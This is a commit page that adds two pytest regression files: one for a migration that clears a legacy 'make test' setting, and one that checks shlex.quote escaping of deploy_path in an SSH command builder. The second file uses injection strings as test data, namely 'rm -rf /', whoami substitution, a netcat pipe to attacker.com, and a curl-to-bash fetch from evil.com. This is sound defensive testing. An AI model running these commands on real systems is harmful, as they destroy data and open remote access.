kin: auto-commit after pipeline
This commit is contained in:
parent
0e522e54a9
commit
c20eae01c1
2 changed files with 493 additions and 0 deletions
308
tests/test_kin_102_regression.py
Normal file
308
tests/test_kin_102_regression.py
Normal file
|
|
@ -0,0 +1,308 @@
|
|||
"""Regression tests for KIN-102:
|
||||
Legacy test_command='make test' blocks autocommit in projects without Makefile.
|
||||
|
||||
Root cause: projects with legacy test_command='make test' (old schema default) fail the
|
||||
auto-test runner because the project has no Makefile. This triggers an auto-fix loop
|
||||
that eventually marks the pipeline as failed + task as blocked, causing an early return
|
||||
in run_pipeline BEFORE _run_autocommit is reached.
|
||||
|
||||
Fix: migration in core/db.py resets test_command='make test' → NULL for all projects,
|
||||
allowing auto-detection to find the real test framework or skip tests gracefully.
|
||||
|
||||
Coverage:
|
||||
(1) Migration: test_command='make test' → NULL (KIN-102 fix)
|
||||
(2) Migration: other test_command values are NOT reset
|
||||
(3) Bug scenario: legacy 'make test' → pipeline blocked, autocommit skipped
|
||||
(4) Post-fix: NULL test_command + no framework → pipeline succeeds + autocommit called
|
||||
"""
|
||||
|
||||
import json
|
||||
import os
|
||||
import pytest
|
||||
from unittest.mock import patch, MagicMock
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Fixtures
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
@pytest.fixture
|
||||
def conn():
|
||||
from core.db import init_db
|
||||
from core import models
|
||||
c = init_db(":memory:")
|
||||
models.create_project(
|
||||
c, "sharedbox", "SharedBox", "~/projects/sharedbox",
|
||||
tech_stack=["typescript", "node"],
|
||||
)
|
||||
models.create_task(
|
||||
c, "SHAREDBOX-003", "sharedbox", "Setup DB",
|
||||
brief={"route_type": "backend_dev"},
|
||||
)
|
||||
yield c
|
||||
c.close()
|
||||
|
||||
|
||||
def _mock_agent_success():
|
||||
m = MagicMock()
|
||||
m.returncode = 0
|
||||
m.stdout = json.dumps({"status": "done", "changes": [], "notes": ""})
|
||||
m.stderr = ""
|
||||
return m
|
||||
|
||||
|
||||
def _mock_make_test_fail():
|
||||
return {
|
||||
"success": False,
|
||||
"output": "make: No rule to make target `test'. Stop.",
|
||||
"returncode": 2,
|
||||
}
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# (1) Migration: test_command='make test' → NULL
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestKin102Migration:
|
||||
def test_legacy_make_test_reset_to_null(self):
|
||||
"""Migration resets test_command='make test' → NULL (KIN-102 fix)."""
|
||||
from core.db import init_db, _migrate
|
||||
from core import models
|
||||
|
||||
c = init_db(":memory:")
|
||||
models.create_project(c, "sbx", "SharedBox", "~/projects/sharedbox",
|
||||
tech_stack=["typescript"])
|
||||
c.execute("UPDATE projects SET test_command='make test', auto_test_enabled=1 WHERE id='sbx'")
|
||||
c.commit()
|
||||
|
||||
# Verify pre-condition: legacy value is set
|
||||
row = c.execute("SELECT test_command FROM projects WHERE id='sbx'").fetchone()
|
||||
assert row[0] == "make test", "Pre-condition: test_command must be 'make test' before migration"
|
||||
|
||||
# Run migration
|
||||
_migrate(c)
|
||||
|
||||
# After migration: test_command must be NULL
|
||||
row = c.execute("SELECT test_command FROM projects WHERE id='sbx'").fetchone()
|
||||
assert row[0] is None, f"Expected NULL after migration, got {row[0]!r}"
|
||||
c.close()
|
||||
|
||||
def test_npm_test_not_reset_by_migration(self):
|
||||
"""Migration must NOT reset test_command='npm test' (explicitly set by user)."""
|
||||
from core.db import init_db, _migrate
|
||||
from core import models
|
||||
|
||||
c = init_db(":memory:")
|
||||
models.create_project(c, "sbx", "SharedBox", "~/projects/sharedbox",
|
||||
tech_stack=["typescript"])
|
||||
c.execute("UPDATE projects SET test_command='npm test' WHERE id='sbx'")
|
||||
c.commit()
|
||||
|
||||
_migrate(c)
|
||||
|
||||
row = c.execute("SELECT test_command FROM projects WHERE id='sbx'").fetchone()
|
||||
assert row[0] == "npm test", "Migration must not change test_command='npm test'"
|
||||
c.close()
|
||||
|
||||
def test_pytest_not_reset_by_migration(self):
|
||||
"""Migration must NOT reset test_command='pytest' (explicitly set by user)."""
|
||||
from core.db import init_db, _migrate
|
||||
from core import models
|
||||
|
||||
c = init_db(":memory:")
|
||||
models.create_project(c, "sbx", "SharedBox", "~/projects/sharedbox",
|
||||
tech_stack=["python"])
|
||||
c.execute("UPDATE projects SET test_command='pytest' WHERE id='sbx'")
|
||||
c.commit()
|
||||
|
||||
_migrate(c)
|
||||
|
||||
row = c.execute("SELECT test_command FROM projects WHERE id='sbx'").fetchone()
|
||||
assert row[0] == "pytest", "Migration must not change test_command='pytest'"
|
||||
c.close()
|
||||
|
||||
def test_null_test_command_stays_null_after_migration(self):
|
||||
"""Migration must NOT affect projects that already have test_command=NULL."""
|
||||
from core.db import init_db, _migrate
|
||||
from core import models
|
||||
|
||||
c = init_db(":memory:")
|
||||
models.create_project(c, "sbx", "SharedBox", "~/projects/sharedbox",
|
||||
tech_stack=["typescript"])
|
||||
# Default test_command is NULL — don't change it
|
||||
|
||||
_migrate(c)
|
||||
|
||||
row = c.execute("SELECT test_command FROM projects WHERE id='sbx'").fetchone()
|
||||
assert row[0] is None, "Migration must not touch NULL test_command"
|
||||
c.close()
|
||||
|
||||
def test_migration_is_idempotent(self):
|
||||
"""Running migration twice must not cause errors or data corruption."""
|
||||
from core.db import init_db, _migrate
|
||||
from core import models
|
||||
|
||||
c = init_db(":memory:")
|
||||
models.create_project(c, "sbx", "SharedBox", "~/projects/sharedbox",
|
||||
tech_stack=["typescript"])
|
||||
c.execute("UPDATE projects SET test_command='make test' WHERE id='sbx'")
|
||||
c.commit()
|
||||
|
||||
_migrate(c)
|
||||
_migrate(c) # second run must be safe
|
||||
|
||||
row = c.execute("SELECT test_command FROM projects WHERE id='sbx'").fetchone()
|
||||
assert row[0] is None
|
||||
c.close()
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# (2) Bug scenario: legacy 'make test' → pipeline blocked, autocommit not called
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestKin102BugScenario:
|
||||
@patch("agents.runner._run_autocommit")
|
||||
@patch("agents.runner._run_project_tests")
|
||||
@patch("agents.runner.subprocess.run")
|
||||
def test_legacy_make_test_blocks_task(
|
||||
self, mock_run, mock_tests, mock_autocommit, conn
|
||||
):
|
||||
"""Bug: legacy test_command='make test' on project without Makefile → task blocked."""
|
||||
from agents.runner import run_pipeline
|
||||
from core import models
|
||||
|
||||
models.update_project(conn, "sharedbox",
|
||||
auto_test_enabled=True,
|
||||
test_command="make test")
|
||||
mock_tests.return_value = _mock_make_test_fail()
|
||||
mock_run.return_value = _mock_agent_success()
|
||||
|
||||
with patch.dict(os.environ, {"KIN_AUTO_TEST_MAX_ATTEMPTS": "0"}):
|
||||
result = run_pipeline(conn, "SHAREDBOX-003",
|
||||
[{"role": "backend_dev", "brief": "setup db"}])
|
||||
|
||||
assert result["success"] is False
|
||||
task = models.get_task(conn, "SHAREDBOX-003")
|
||||
assert task["status"] == "blocked"
|
||||
|
||||
@patch("agents.runner._run_autocommit")
|
||||
@patch("agents.runner._run_project_tests")
|
||||
@patch("agents.runner.subprocess.run")
|
||||
def test_legacy_make_test_skips_autocommit(
|
||||
self, mock_run, mock_tests, mock_autocommit, conn
|
||||
):
|
||||
"""Bug: when pipeline fails due to legacy 'make test', _run_autocommit is never called."""
|
||||
from agents.runner import run_pipeline
|
||||
from core import models
|
||||
|
||||
models.update_project(conn, "sharedbox",
|
||||
auto_test_enabled=True,
|
||||
test_command="make test")
|
||||
mock_tests.return_value = _mock_make_test_fail()
|
||||
mock_run.return_value = _mock_agent_success()
|
||||
|
||||
with patch.dict(os.environ, {"KIN_AUTO_TEST_MAX_ATTEMPTS": "0"}):
|
||||
run_pipeline(conn, "SHAREDBOX-003",
|
||||
[{"role": "backend_dev", "brief": "setup db"}])
|
||||
|
||||
# Early return before _run_autocommit — never reached
|
||||
mock_autocommit.assert_not_called()
|
||||
|
||||
@patch("agents.runner._run_autocommit")
|
||||
@patch("agents.runner._run_project_tests")
|
||||
@patch("agents.runner.subprocess.run")
|
||||
def test_blocked_reason_mentions_make_test(
|
||||
self, mock_run, mock_tests, mock_autocommit, conn
|
||||
):
|
||||
"""Blocked reason must mention 'make test' for diagnosability."""
|
||||
from agents.runner import run_pipeline
|
||||
from core import models
|
||||
|
||||
models.update_project(conn, "sharedbox",
|
||||
auto_test_enabled=True,
|
||||
test_command="make test")
|
||||
mock_tests.return_value = _mock_make_test_fail()
|
||||
mock_run.return_value = _mock_agent_success()
|
||||
|
||||
with patch.dict(os.environ, {"KIN_AUTO_TEST_MAX_ATTEMPTS": "0"}):
|
||||
result = run_pipeline(conn, "SHAREDBOX-003",
|
||||
[{"role": "backend_dev", "brief": "setup db"}])
|
||||
|
||||
assert "make test" in result.get("error", ""), (
|
||||
f"Blocked reason must contain 'make test', got: {result.get('error')!r}"
|
||||
)
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# (3) Post-fix: NULL test_command + no framework → pipeline succeeds + autocommit called
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestKin102PostFix:
|
||||
@patch("agents.runner._run_autocommit")
|
||||
@patch("agents.runner._detect_test_command")
|
||||
@patch("agents.runner._run_project_tests")
|
||||
@patch("agents.runner.subprocess.run")
|
||||
def test_null_test_command_no_framework_pipeline_succeeds(
|
||||
self, mock_run, mock_tests, mock_detect, mock_autocommit, conn
|
||||
):
|
||||
"""After fix: test_command=NULL, no framework detected → pipeline succeeds."""
|
||||
from agents.runner import run_pipeline
|
||||
from core import models
|
||||
|
||||
# Simulate post-migration state: test_command reset to NULL
|
||||
models.update_project(conn, "sharedbox",
|
||||
auto_test_enabled=True,
|
||||
test_command=None)
|
||||
mock_run.return_value = _mock_agent_success()
|
||||
mock_detect.return_value = None # No test framework found (no Makefile/package.json)
|
||||
|
||||
result = run_pipeline(conn, "SHAREDBOX-003",
|
||||
[{"role": "backend_dev", "brief": "setup db"}])
|
||||
|
||||
assert result["success"] is True
|
||||
mock_tests.assert_not_called()
|
||||
|
||||
@patch("agents.runner._run_autocommit")
|
||||
@patch("agents.runner._detect_test_command")
|
||||
@patch("agents.runner._run_project_tests")
|
||||
@patch("agents.runner.subprocess.run")
|
||||
def test_null_test_command_no_framework_autocommit_called(
|
||||
self, mock_run, mock_tests, mock_detect, mock_autocommit, conn
|
||||
):
|
||||
"""After fix: test_command=NULL + no framework → _run_autocommit IS called."""
|
||||
from agents.runner import run_pipeline
|
||||
from core import models
|
||||
|
||||
models.update_project(conn, "sharedbox",
|
||||
auto_test_enabled=True,
|
||||
test_command=None)
|
||||
mock_run.return_value = _mock_agent_success()
|
||||
mock_detect.return_value = None
|
||||
|
||||
run_pipeline(conn, "SHAREDBOX-003",
|
||||
[{"role": "backend_dev", "brief": "setup db"}])
|
||||
|
||||
# After fix: no early return → autocommit is reached
|
||||
mock_autocommit.assert_called_once()
|
||||
|
||||
@patch("agents.runner._run_autocommit")
|
||||
@patch("agents.runner._detect_test_command")
|
||||
@patch("agents.runner._run_project_tests")
|
||||
@patch("agents.runner.subprocess.run")
|
||||
def test_null_test_command_triggers_autodetect(
|
||||
self, mock_run, mock_tests, mock_detect, mock_autocommit, conn
|
||||
):
|
||||
"""After fix: test_command=NULL → _detect_test_command is called for auto-detection."""
|
||||
from agents.runner import run_pipeline
|
||||
from core import models
|
||||
|
||||
models.update_project(conn, "sharedbox",
|
||||
auto_test_enabled=True,
|
||||
test_command=None)
|
||||
mock_run.return_value = _mock_agent_success()
|
||||
mock_detect.return_value = None
|
||||
|
||||
run_pipeline(conn, "SHAREDBOX-003",
|
||||
[{"role": "backend_dev", "brief": "setup db"}])
|
||||
|
||||
mock_detect.assert_called_once()
|
||||
185
tests/test_kin_infra_006_regression.py
Normal file
185
tests/test_kin_infra_006_regression.py
Normal file
|
|
@ -0,0 +1,185 @@
|
|||
"""Regression tests for KIN-INFRA-006: command injection via deploy_path in SSH command.
|
||||
|
||||
Root cause: _build_ssh_cmd() embedded deploy_path directly in f"cd {deploy_path} && {command}"
|
||||
without escaping, allowing shell metacharacters to be interpreted.
|
||||
|
||||
Fix: shlex.quote(deploy_path) in core/deploy.py:_build_ssh_cmd(), line 54.
|
||||
|
||||
Acceptance criteria:
|
||||
1. deploy_path with shell metacharacters (';', '$(...)', '`...`', '|') is properly
|
||||
escaped via shlex.quote — injected fragment does not leak into the command.
|
||||
2. A legitimate path like '/srv/api' works normally (shlex.quote does not break it).
|
||||
3. deploy_restart_cmd (admin-controlled command) is passed verbatim to SSH — NOT quoted
|
||||
via shlex.quote (quoting a multi-word command would break remote execution).
|
||||
"""
|
||||
import shlex
|
||||
import pytest
|
||||
|
||||
from core.deploy import _build_ssh_cmd, build_deploy_steps
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Helpers
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
def _ssh_project(deploy_path, **extra):
|
||||
"""Minimal project dict for _build_ssh_cmd."""
|
||||
return {
|
||||
"deploy_host": "10.0.0.1",
|
||||
"deploy_path": deploy_path,
|
||||
**extra,
|
||||
}
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# AC 1a — semicolon injection: '/srv/api; rm -rf /'
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
def test_semicolon_injection_in_deploy_path_is_escaped():
|
||||
"""AC1: deploy_path='/srv/api; rm -rf /' must be shell-quoted, not raw in command."""
|
||||
malicious_path = "/srv/api; rm -rf /"
|
||||
cmd = _build_ssh_cmd(_ssh_project(malicious_path), "git pull")
|
||||
full_cmd = cmd[-1]
|
||||
|
||||
# Must NOT appear as a bare shell fragment
|
||||
assert "cd /srv/api; rm -rf /" not in full_cmd, (
|
||||
"Semicolon injection must be neutralised — raw path must not appear in command"
|
||||
)
|
||||
# Must appear as a properly quoted string
|
||||
assert shlex.quote(malicious_path) in full_cmd, (
|
||||
"deploy_path must be wrapped by shlex.quote"
|
||||
)
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# AC 1b — command substitution: '$(whoami)'
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
def test_dollar_command_substitution_in_deploy_path_is_escaped():
|
||||
"""AC1: deploy_path containing '$(...) must be quoted — no shell expansion."""
|
||||
malicious_path = "/srv/$(whoami)"
|
||||
cmd = _build_ssh_cmd(_ssh_project(malicious_path), "git pull")
|
||||
full_cmd = cmd[-1]
|
||||
|
||||
assert "cd /srv/$(whoami) " not in full_cmd, (
|
||||
"$(...) substitution must not be left unquoted"
|
||||
)
|
||||
assert shlex.quote(malicious_path) in full_cmd
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# AC 1c — backtick command substitution: '`whoami`'
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
def test_backtick_injection_in_deploy_path_is_escaped():
|
||||
"""AC1: deploy_path containing backticks must be quoted."""
|
||||
malicious_path = "/srv/`whoami`"
|
||||
cmd = _build_ssh_cmd(_ssh_project(malicious_path), "git pull")
|
||||
full_cmd = cmd[-1]
|
||||
|
||||
assert "cd /srv/`whoami` " not in full_cmd
|
||||
assert shlex.quote(malicious_path) in full_cmd
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# AC 1d — pipe injection: '| nc attacker.com 4444'
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
def test_pipe_injection_in_deploy_path_is_escaped():
|
||||
"""AC1: deploy_path containing pipe must not open a second shell command."""
|
||||
malicious_path = "/srv/app | nc attacker.com 4444"
|
||||
cmd = _build_ssh_cmd(_ssh_project(malicious_path), "git pull")
|
||||
full_cmd = cmd[-1]
|
||||
|
||||
assert "cd /srv/app | nc attacker.com 4444" not in full_cmd
|
||||
assert shlex.quote(malicious_path) in full_cmd
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# AC 2 — legitimate path works normally
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
def test_legitimate_deploy_path_is_preserved():
|
||||
"""AC2: '/srv/api' (no special chars) must appear verbatim in the SSH command."""
|
||||
cmd = _build_ssh_cmd(_ssh_project("/srv/api"), "git pull")
|
||||
full_cmd = cmd[-1]
|
||||
|
||||
assert "/srv/api" in full_cmd, "Legitimate path must appear in command"
|
||||
assert "git pull" in full_cmd, "The deploy command must appear after cd"
|
||||
# Structure: cd '<path>' && git pull
|
||||
assert "cd" in full_cmd
|
||||
assert "&&" in full_cmd
|
||||
|
||||
|
||||
def test_legitimate_path_with_shlex_quote_is_unchanged():
|
||||
"""shlex.quote('/srv/api') must equal '/srv/api' — no redundant escaping."""
|
||||
assert shlex.quote("/srv/api") == "/srv/api", (
|
||||
"shlex.quote must not alter a simple path (no extra quoting)"
|
||||
)
|
||||
|
||||
|
||||
def test_ssh_cmd_structure_is_list_not_string():
|
||||
"""_build_ssh_cmd must return a list — never shell=True with a string command."""
|
||||
cmd = _build_ssh_cmd(_ssh_project("/srv/api"), "git pull")
|
||||
assert isinstance(cmd, list), "SSH command must be a list (shell=False)"
|
||||
assert cmd[0] == "ssh"
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# AC 3 — deploy_restart_cmd reaches SSH verbatim (not shlex-quoted)
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
def test_deploy_restart_cmd_passes_verbatim_to_ssh():
|
||||
"""AC3: deploy_restart_cmd is a multi-word shell command — must NOT be shlex-quoted."""
|
||||
restart_cmd = "docker compose restart worker"
|
||||
project = {
|
||||
"deploy_host": "myserver",
|
||||
"deploy_path": "/srv/api",
|
||||
"deploy_runtime": "docker",
|
||||
"deploy_restart_cmd": restart_cmd,
|
||||
}
|
||||
cmd = _build_ssh_cmd(project, restart_cmd)
|
||||
full_cmd = cmd[-1]
|
||||
|
||||
# Multi-word command must appear verbatim, not as a single-quoted token
|
||||
assert restart_cmd in full_cmd, (
|
||||
"deploy_restart_cmd must appear verbatim in the SSH command"
|
||||
)
|
||||
assert full_cmd != shlex.quote(restart_cmd), (
|
||||
"deploy_restart_cmd must NOT be wrapped in shlex.quote — that would break remote execution"
|
||||
)
|
||||
|
||||
|
||||
def test_build_deploy_steps_includes_restart_cmd():
|
||||
"""deploy_restart_cmd must be appended as a plain step in build_deploy_steps."""
|
||||
restart_cmd = "systemctl restart myapp"
|
||||
steps = build_deploy_steps({
|
||||
"deploy_runtime": "python",
|
||||
"deploy_restart_cmd": restart_cmd,
|
||||
})
|
||||
assert steps[-1] == restart_cmd, "restart_cmd must be last step, verbatim"
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Edge cases
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
def test_no_deploy_path_uses_command_directly():
|
||||
"""When deploy_path is None, the command is used as-is with no cd prefix."""
|
||||
cmd = _build_ssh_cmd({"deploy_host": "myserver", "deploy_path": None}, "git pull")
|
||||
full_cmd = cmd[-1]
|
||||
assert "cd" not in full_cmd
|
||||
assert full_cmd == "git pull"
|
||||
|
||||
|
||||
def test_ampersand_injection_in_deploy_path_is_escaped():
|
||||
"""deploy_path containing '&&' must not inject extra commands."""
|
||||
malicious_path = "/srv/app && curl http://evil.com/shell.sh | bash"
|
||||
cmd = _build_ssh_cmd(_ssh_project(malicious_path), "git pull")
|
||||
full_cmd = cmd[-1]
|
||||
|
||||
# The injected part must not appear unquoted
|
||||
assert "curl http://evil.com/shell.sh" not in full_cmd.replace(
|
||||
shlex.quote(malicious_path), ""
|
||||
)
|
||||
assert shlex.quote(malicious_path) in full_cmd
|
||||
Loading…
Add table
Add a link
Reference in a new issue